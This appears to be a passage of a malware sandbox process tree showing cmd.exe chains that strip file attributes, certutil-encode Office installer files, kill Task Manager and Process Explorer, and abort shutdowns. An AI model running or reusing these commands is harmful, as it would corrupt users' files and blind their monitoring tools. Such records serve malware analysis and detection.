C:\Windows\system32\certutil.execertutil -encode -f "Setup.xml" "Setup.xml".148495⤵PID:1964
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:660
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1576
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "PowerPointMUI.msi" "PowerPointMUI.msi".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:744
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
- Views/modifies file attributes
PID:1296
-
-
C:\Windows\system32\certutil.execertutil -encode -f "PowerPointMUI.msi" "PowerPointMUI.msi".148495⤵PID:556
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:944
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:852
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "PowerPointMUI.xml" "PowerPointMUI.xml".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:828
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:1316
-
-
C:\Windows\system32\certutil.execertutil -encode -f "PowerPointMUI.xml" "PowerPointMUI.xml".148495⤵PID:328
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
- Kills process with taskkill
PID:692
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1716
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "PptLR.cab" "PptLR.cab".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1688
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:1920
-
-
C:\Windows\system32\certutil.execertutil -encode -f "PptLR.cab" "PptLR.cab".148495⤵PID:900
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:1932
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1700
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "Setup.xml" "Setup.xml".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1756
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:1820
-
-
C:\Windows\system32\certutil.execertutil -encode -f "Setup.xml" "Setup.xml".148495⤵PID:1516
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:1152
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1624
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "PublisherMUI.msi" "PublisherMUI.msi".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1664
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:1428
-
-
C:\Windows\system32\certutil.execertutil -encode -f "PublisherMUI.msi" "PublisherMUI.msi".148495⤵PID:436
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:1944
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1992
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "PublisherMUI.xml" "PublisherMUI.xml".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1464
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:1888
-
-
C:\Windows\system32\certutil.execertutil -encode -f "PublisherMUI.xml" "PublisherMUI.xml".148495⤵PID:1572
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:1364
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:764
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "PubLR.cab" "PubLR.cab".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:868
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:1576
-
-
C:\Windows\system32\certutil.execertutil -encode -f "PubLR.cab" "PubLR.cab".148495⤵PID:788
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
- Kills process with taskkill
PID:1884
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:944
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "Setup.xml" "Setup.xml".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:852
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:744
-
-
C:\Windows\system32\certutil.execertutil -encode -f "Setup.xml" "Setup.xml".148495⤵PID:1672
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:1488
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:692
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "OutlkLR.cab" "OutlkLR.cab".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1716
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:828
-
-
C:\Windows\system32\certutil.execertutil -encode -f "OutlkLR.cab" "OutlkLR.cab".148495⤵PID:1920
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
- Kills process with taskkill
PID:1628
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1656
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "OutlookMUI.msi" "OutlookMUI.msi".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:612
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:1832
-
-
C:\Windows\system32\certutil.execertutil -encode -f "OutlookMUI.msi" "OutlookMUI.msi".148495⤵PID:1820
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
- Kills process with taskkill
PID:1516
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1152
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "OutlookMUI.xml" "OutlookMUI.xml".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1624
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:1756
-
-
C:\Windows\system32\certutil.execertutil -encode -f "OutlookMUI.xml" "OutlookMUI.xml".148495⤵PID:1880
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:1540
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:816
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "Setup.xml" "Setup.xml".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1680
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:1812
-
-
C:\Windows\system32\certutil.execertutil -encode -f "Setup.xml" "Setup.xml".148495⤵PID:1888
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:1388
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1204
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "Setup.xml" "Setup.xml".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:764
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:1464
-
-
C:\Windows\system32\certutil.execertutil -encode -f "Setup.xml" "Setup.xml".148495⤵PID:1576
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:1480
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1596
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "WordLR.cab" "WordLR.cab".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1884
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:1712
-
-
C:\Windows\system32\certutil.execertutil -encode -f "WordLR.cab" "WordLR.cab".148495⤵PID:868
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:328
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1940
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "WordMUI.msi" "WordMUI.msi".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1488
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:1776
-
-
C:\Windows\system32\certutil.execertutil -encode -f "WordMUI.msi" "WordMUI.msi".148495⤵PID:852
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:1792
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:900
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "WordMUI.xml" "WordMUI.xml".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1932
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:1764
-
-
C:\Windows\system32\certutil.execertutil -encode -f "WordMUI.xml" "WordMUI.xml".148495⤵PID:1832
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:1820
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:940
-
-
-
C:\Windows\system32\cmd.exe/c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "Proof.en" "Proof.en".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1988
-
-
C:\Windows\system32\cmd.exe/c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "Proof.es" "Proof.es".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1700
-
-
C:\Windows\system32\cmd.exe/c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "Proof.fr" "Proof.fr".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1732
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "Proofing.msi" "Proofing.msi".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1428
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:1336
-
-
C:\Windows\system32\certutil.execertutil -encode -f "Proofing.msi" "Proofing.msi".148495⤵PID:1928
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:1752
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:964
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "Proofing.xml" "Proofing.xml".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1812
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:1840
-
-
C:\Windows\system32\certutil.execertutil -encode -f "Proofing.xml" "Proofing.xml".148495⤵PID:1964
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:1568
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1992
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "Setup.xml" "Setup.xml".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1464
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:1512
-
-
C:\Windows\system32\certutil.execertutil -encode -f "Setup.xml" "Setup.xml".148495⤵PID:1848
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:1164
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:764
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "Proof.cab" "Proof.cab".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1600
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:1352
-
-
C:\Windows\system32\certutil.execertutil -encode -f "Proof.cab" "Proof.cab".148495⤵PID:1564
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:1088
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1684
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "Proof.msi" "Proof.msi".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1776
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:1696
-
-
C:\Windows\system32\certutil.execertutil -encode -f "Proof.msi" "Proof.msi".148495⤵PID:636
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:1016
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:656
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "Proof.xml" "Proof.xml".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1716
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:1748
-
-
C:\Windows\system32\certutil.execertutil -encode -f "Proof.xml" "Proof.xml".148495⤵PID:1436
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:1592
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:940
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "Proof.cab" "Proof.cab".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1152
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:612
-
-
C:\Windows\system32\certutil.execertutil -encode -f "Proof.cab" "Proof.cab".148495⤵PID:1756
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:1336
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:436
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "Proof.msi" "Proof.msi".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1752
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:1664
-
-
C:\Windows\system32\certutil.execertutil -encode -f "Proof.msi" "Proof.msi".148495⤵PID:1428
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:760
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1572
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "Proof.xml" "Proof.xml".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1568
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:1680
-
-
C:\Windows\system32\certutil.execertutil -encode -f "Proof.xml" "Proof.xml".148495⤵PID:1812
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:1736
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1480
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "Proof.cab" "Proof.cab".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1164
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:1712
-
-
C:\Windows\system32\certutil.execertutil -encode -f "Proof.cab" "Proof.cab".148495⤵PID:1068
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:1352
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1316
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "Proof.msi" "Proof.msi".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1088
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:1884
-
-
C:\Windows\system32\certutil.execertutil -encode -f "Proof.msi" "Proof.msi".148495⤵PID:1600
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:1468
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1920
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "Proof.xml" "Proof.xml".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1016
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:1688
-
-
C:\Windows\system32\certutil.execertutil -encode -f "Proof.xml" "Proof.xml".148495⤵PID:1776
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:1832
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1900
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "InfLR.cab" "InfLR.cab".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1592
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:1656
-
-
C:\Windows\system32\certutil.execertutil -encode -f "InfLR.cab" "InfLR.cab".148495⤵PID:1764
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
- Kills process with taskkill
PID:612
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1892
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "InfoPathMUI.msi" "InfoPathMUI.msi".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1336
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:1816
-
-
C:\Windows\system32\certutil.execertutil -encode -f "InfoPathMUI.msi" "InfoPathMUI.msi".148495⤵PID:1152
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:316
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1204
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "InfoPathMUI.xml" "InfoPathMUI.xml".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1888
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:1520
-
-
C:\Windows\system32\certutil.execertutil -encode -f "InfoPathMUI.xml" "InfoPathMUI.xml".148495⤵PID:1624
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:1680
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1148
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "Setup.xml" "Setup.xml".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:788
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:556
-
-
C:\Windows\system32\certutil.execertutil -encode -f "Setup.xml" "Setup.xml".148495⤵PID:1252
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:1712
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:912
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "OneNoteMUI.msi" "OneNoteMUI.msi".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1352
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:328
-
-
C:\Windows\system32\certutil.execertutil -encode -f "OneNoteMUI.msi" "OneNoteMUI.msi".148495⤵PID:944
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:1884
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1628
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "OneNoteMUI.xml" "OneNoteMUI.xml".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:572
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵
- Views/modifies file attributes
PID:852
-
-
C:\Windows\system32\certutil.execertutil -encode -f "OneNoteMUI.xml" "OneNoteMUI.xml".148495⤵PID:648
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:1088
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1776
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "OnoteLR.cab" "OnoteLR.cab".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1820
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:1436
-
-
C:\Windows\system32\certutil.execertutil -encode -f "OnoteLR.cab" "OnoteLR.cab".148495⤵PID:1660
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:1488
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:592
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "Setup.xml" "Setup.xml".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1732
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:1880
-
-
C:\Windows\system32\certutil.execertutil -encode -f "Setup.xml" "Setup.xml".148495⤵PID:1928
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:1592
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:660
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "GrooveLR.cab" "GrooveLR.cab".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:680
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:1840
-
-
C:\Windows\system32\certutil.execertutil -encode -f "GrooveLR.cab" "GrooveLR.cab".148495⤵PID:1964
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:1540
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1572
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "GrooveMUI.msi" "GrooveMUI.msi".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1692
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:1576
-
-
C:\Windows\system32\certutil.execertutil -encode -f "GrooveMUI.msi" "GrooveMUI.msi".148495⤵PID:1848
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:760
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1252
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "GrooveMUI.xml" "GrooveMUI.xml".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1908
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:1464
-
-
C:\Windows\system32\certutil.execertutil -encode -f "GrooveMUI.xml" "GrooveMUI.xml".148495⤵PID:1712
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵
- Kills process with taskkill
PID:912
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1164
-
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "Setup.xml" "Setup.xml".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:2036
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:1452
-
-
C:\Windows\system32\certutil.execertutil -encode -f "Setup.xml" "Setup.xml".148495⤵PID:1884
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:1628
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1920
-
-
-
C:\Windows\system32\cmd.exe/c if TRUE==FALSE attrib -s -h -r *.* & certutil -encode -f "1033" "1033".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1748
-
-
C:\Windows\system32\cmd.exe/c if FALSE==FALSE attrib -s -h -r *.* & certutil -encode -f "branding.xml" "branding.xml".14849 & taskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe & shutdown /a4⤵PID:1688
-
C:\Windows\system32\attrib.exeattrib -s -h -r *.*5⤵PID:656
-
-
C:\Windows\system32\certutil.execertutil -encode -f "branding.xml" "branding.xml".148495⤵PID:1516
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr.exe /im procexp.exe /im procexp64.exe /im processhacker.exe5⤵PID:636
-
-
C:\Windows\system32\shutdown.exeshutdown /a5⤵PID:1660
-
-
-
